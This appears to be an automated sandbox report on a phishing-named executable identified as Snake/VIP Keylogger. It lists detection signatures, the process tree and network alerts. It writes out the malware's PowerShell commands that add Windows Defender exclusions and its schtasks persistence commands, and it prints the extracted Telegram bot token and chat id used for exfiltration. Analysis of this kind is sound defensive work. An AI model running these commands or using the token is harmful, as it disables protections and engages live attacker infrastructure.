
Windows Analysis Report
Shipment advice H-BL Draft.exe

Overview

General Information

Sample name: Shipment advice H-BL Draft.exe
Analysis ID: 1632061
MD5: 83dbd3ae208a7ead15608402f92c0472
SHA1: cf2decf01276e50139778052a969044d4fc9d184
SHA256: 2b4b87faf461d7fc3d1ca3344b9a5d0b52c98a63ef59ff5d53d9d9620cae98d4
Tags: exe, user-James_inthe_box

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Shipment advice H-BL Draft.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe" MD5: 83DBD3AE208A7EAD15608402F92C0472)
    • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5236 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 8120 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PrcGlGVKeUCXxg.exe (PID: 1340 cmdline: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe MD5: 83DBD3AE208A7EAD15608402F92C0472)
    • schtasks.exe (PID: 1208 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PrcGlGVKeUCXxg.exe (PID: 7888 cmdline: "C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe" MD5: 83DBD3AE208A7EAD15608402F92C0472)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}
{"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}
Source | Rule | Description | Author | Strings
0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000012.00000002.3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000012.00000002.3719627669.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Source | Rule | Description | Author | Strings
13.2.Shipment advice H-BL Draft.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hooking | ditekSHen |
  • 0x2ef1b:$s1: UnHook
  • 0x2ef22:$s2: SetHook
  • 0x2ef2a:$s3: CallNextHook
  • 0x2ef37:$s4: _hook
14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ProcessId: 8000, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ProcessId: 8000, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe, ParentImage: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe, ParentProcessId: 1340, ParentProcessName: PrcGlGVKeUCXxg.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmp110D.tmp", ProcessId: 1208, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", ProcessId: 8120, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ProcessId: 8000, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipment advice H-BL Draft.exe", ParentImage: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe, ParentProcessId: 7548, ParentProcessName: Shipment advice H-BL Draft.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp", ProcessId: 8120, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T19:02:40.073563+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49718 | 104.21.32.1 | 443 | TCP
2025-03-07T19:02:43.664857+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49726 | 104.21.32.1 | 443 | TCP
2025-03-07T19:02:44.721817+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49727 | 104.21.32.1 | 443 | TCP
2025-03-07T19:02:56.715434+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
2025-03-07T19:02:58.950444+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.32.1 | 443 | TCP
2025-03-07T19:03:02.772426+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 104.21.32.1 | 443 | TCP
2025-03-07T19:03:06.352528+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.32.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T19:02:32.930833+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49716 | 193.122.6.168 | 80 | TCP
2025-03-07T19:02:36.618332+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49716 | 193.122.6.168 | 80 | TCP
2025-03-07T19:02:38.774582+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49719 | 193.122.6.168 | 80 | TCP
2025-03-07T19:02:40.883982+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49724 | 193.122.6.168 | 80 | TCP
2025-03-07T19:02:42.243262+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49719 | 193.122.6.168 | 80 | TCP
2025-03-07T19:02:45.493411+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49730 | 193.122.6.168 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T19:03:09.926380+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49751 | 149.154.167.220 | 443 | TCP
2025-03-07T19:03:16.787087+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49755 | 149.154.167.220 | 443 | TCP

AV Detection

Source: Shipment advice H-BL Draft.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Avira: detection malicious, Label: TR/AD.SnakeStealer.joxcl
Source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat id": "6744331132"}
Source: 0000000D.00000002.3718301984.00000000029A1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc", "Chat_id": "6744331132", "Version": "4.4"}
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | ReversingLabs: Detection: 60%
Source: Shipment advice H-BL Draft.exe | Virustotal: Detection: 63%
Source: Shipment advice H-BL Draft.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack | String decryptor: 7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack | String decryptor: 6744331132
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack | String decryptor:
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack | String decryptor: 7699178513:AAEhuKQBbaAxJ54evVaAuMwZLV8FZ2cw8Rc
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack | String decryptor: 6744331132
Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack | String decryptor:

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Shipment advice H-BL Draft.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49717 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49722 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49754 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: Shipment advice H-BL Draft.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 07CC2934h | 0_2_07CC2B38
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0280F45Dh | 13_2_0280F2C0
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0280F45Dh | 13_2_0280F4AC
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0280FC19h | 13_2_0280F970
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 06693308h | 13_2_06692EF0
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 06692D41h | 13_2_06692A90
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669D919h | 13_2_0669D670
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 13_2_06690673
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 06693308h | 13_2_06693236
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669D4C1h | 13_2_0669D218
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669DD71h | 13_2_0669DAC8
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669E621h | 13_2_0669E378
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669E1C9h | 13_2_0669DF20
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 06690D0Dh | 13_2_06690B30
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 066916F8h | 13_2_06690B30
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669EA79h | 13_2_0669E7D0
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 13_2_06690040
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 13_2_06690853
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669EED1h | 13_2_0669EC28
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669F781h | 13_2_0669F4D8
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669F329h | 13_2_0669F080
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669FBD9h | 13_2_0669F930
Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Code function: 4x nop then jmp 0669D069h | 13_2_0669CDC0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 07781B5Ch | 14_2_07781D60
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 0148F45Dh | 18_2_0148F2C0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 0148F45Dh | 18_2_0148F4AC
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 0148FC19h | 18_2_0148F961
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C7EB5h | 18_2_056C7B78
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C9280h | 18_2_056C8FB0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CC82Fh | 18_2_056CC560
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CA83Fh | 18_2_056CA570
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C0FF1h | 18_2_056C0D48
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CE81Fh | 18_2_056CE550
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CECAFh | 18_2_056CE9E0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C18A1h | 18_2_056C15F8
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CCCBFh | 18_2_056CC9F0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C1449h | 18_2_056C11A0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C3709h | 18_2_056C3460
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C02E9h | 18_2_056C0040
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CBF0Fh | 18_2_056CBC40
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C9F1Fh | 18_2_056C9C50
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C62D9h | 18_2_056C6030
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CDEFFh | 18_2_056CDC30
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C32B1h | 18_2_056C3008
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CA3AFh | 18_2_056CA0E0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C0B99h | 18_2_056C08F0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CE38Fh | 18_2_056CE0C0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CC39Fh | 18_2_056CC0D0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C6733h | 18_2_056C6488
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C0741h | 18_2_056C0498
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C2A01h | 18_2_056C2758
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C55D1h | 18_2_056C5328
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C79C9h | 18_2_056C7720
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CB5EFh | 18_2_056CB320
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C25A9h | 18_2_056C2300
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CF5CFh | 18_2_056CF300
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CD5DFh | 18_2_056CD310
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C9A8Fh | 18_2_056C97C0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C5E81h | 18_2_056C5BD8
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CDA6Fh | 18_2_056CD7A0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C2E59h | 18_2_056C2BB0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CBA7Fh | 18_2_056CB7B0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C5A29h | 18_2_056C5780
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CFA5Fh | 18_2_056CF790
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C4D21h | 18_2_056C4A78
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C7119h | 18_2_056C6E70
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CF13Fh | 18_2_056CEE70
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C1CF9h | 18_2_056C1A50
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C48C9h | 18_2_056C4620
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CACCFh | 18_2_056CAA00
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C6CC1h | 18_2_056C6A18
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C7571h | 18_2_056C72C8
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C5179h | 18_2_056C4ED0
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056C2151h | 18_2_056C1EA8
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CD14Fh | 18_2_056CCE80
Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe | Code function: 4x nop then jmp 056CB15Fh | 18_2_056CAE90

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
